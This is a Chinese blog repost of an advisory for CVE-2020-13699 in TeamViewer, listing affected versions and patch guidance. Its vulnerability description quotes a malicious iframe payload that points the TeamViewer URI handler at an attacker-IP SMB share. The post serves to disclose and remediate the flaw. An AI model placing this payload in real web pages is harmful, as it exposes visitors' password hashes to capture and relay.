统计
  • 建站日期:2021-03-10
  • 文章总数:689 篇
  • 评论总数:726 条
  • 分类总数:10 个
  • 最后更新:12月3日
文章 值得一看

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告

程序员阿鑫
首页 值得一看 正文

CVE-2020-13699:TeamViewer用户密码破解漏洞通告-程序员阿鑫-带你一起秃头!-第1张图片

攻击者通过让被攻击者点击精心构造的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。
近日,TeamViewer 官方发布了 TeamViewer 用户密码破解漏洞 的风险通告,漏洞概况如下:
一:CVE编号
CVE-2020-13699
风险等级高危
利用条件
访问攻击者精心构造的恶意页面
二:漏洞详情
TeamViewer是一款可以随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问的远程连接控制软件。
TeamViewer多个版本中存在 用户密码破解漏洞,攻击者通过让被攻击者点击精心构造的嵌入恶意iframe(iframe src="teamviewer10: --play attacker-IPsharefake.tvs")的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。
三、影响范围
 
【影响版本】
TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3
四、解决方案
 
打开TeamViewer -> 点击按钮帮助 -> 点击按钮关于TeamViewer -> 查看TeamViewer版本号。
CVE-2020-13699:TeamViewer用户密码破解漏洞通告-程序员阿鑫-带你一起秃头!-第2张图片
以确保TeamViewer的版本是非漏洞版本。
针对此漏洞官方已在8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3版本中修复。
请受影响的用户参考以下链接安装补丁更新:https://www.teamviewer.com/en/download/previous-versions/

以上是《CVE-2020-13699: TeamViewer 用户密码破解漏洞通告》的全部内容

感谢您对程序员阿鑫博客的支持!

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

-- 展开阅读全文 --
这篇文章最后更新于2020-8-13,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
微信怎么减少腾讯游戏号被封天数?这样操作减轻50%!
« 上一篇
PandaOCR 2.63 免费全能OCR图文识别工具
下一篇 »
为了防止灌水评论,登录后即可评论!
注册登录

HI ! 请登录
注册会员,享受下载全站资源特权。
登陆 注册
上号,带你一起秃头!

IP地址

热门文章

1
抖音无限礼物模拟小工具分享
2
QQ假红包引流QQ群教程及代码
4
卡QQ永久大会员方法

最新文章

标签